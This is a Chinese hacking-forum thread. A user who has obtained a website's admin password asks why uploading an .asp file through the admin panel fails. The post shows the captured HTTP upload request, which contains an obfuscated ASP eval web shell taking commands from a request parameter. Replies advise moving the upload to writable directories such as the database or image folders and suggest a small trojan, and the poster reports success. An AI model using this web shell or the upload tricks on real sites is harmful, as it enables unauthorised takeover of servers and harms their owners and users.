[讨论]后台可上传.asp文件,但是写入失败.?
译文作者:miao2好不容易得到了后台密码,进去后发现可传.asp文件,一下笑了. :-)
但是上传时提示写入失败
ADODB.Stream 错误 '800a0bbc'
写入文件失败。
这是抓包内容:
POST /admin/upload_asp.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: [url]http://www.xxxxx.com/admin/upload_aspform.asp[/url]
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d78c2931029c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: [url]www.xxxxx.com[/url]
Content-Length: 761
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTTSDDQ=PPNMLHJDIKINOAIMEOAHHPDH; xoYuStudioUserDj=4; xoYuStudioUserName=admin
-----------------------------7d74e3031029c
Content-Disposition: form-data; name="filepath"
../uploadasp/
-----------------------------7d74e3031029c
Content-Disposition: form-data; name="act"
upload
-----------------------------7d74e3031029c
Content-Disposition: form-data; name="file"; filename="C:\Documents and Settings\et\桌面\eval.asp"
Content-Type: text/plain
<%
set sobiny = server.CreateObject("MSScriptControl.ScriptControl.1")
sobiny.Language="VBScript"
sobiny.AddObject "Response", Response
sobiny.AddObject "request", request
sobiny.ExecuteStatement("ev"&"al(request(""a""))")
%>
-----------------------------7d74e3031029c
Content-Disposition: form-data; name="Submit"
上传
-----------------------------7d74e3031029c--
尝试过修改路径,加空格的方法上传,但是还是不能成功.请高手指教? 是因为没有目录 一般是目录权限问题,换一个可写的目录应该就可以了 修改路径也不行???是你没找到可以修改权限的目录吧,跳到数据库目录去,我就不信这个目录他也不允许修改写入。
还有哈,改包上传的干吗还弄个("ev"&"al(request(""a""))")太费事了,还得客户端连上去,直接弄个小马吧 目录不可写.
找个可写的目录
看他主站有木有上传的图片.记下路径
找到DB目录更好..一般那目录都是可写的.. 十分感谢。 现在问题解决了 目录不可写吧!
页:
[1]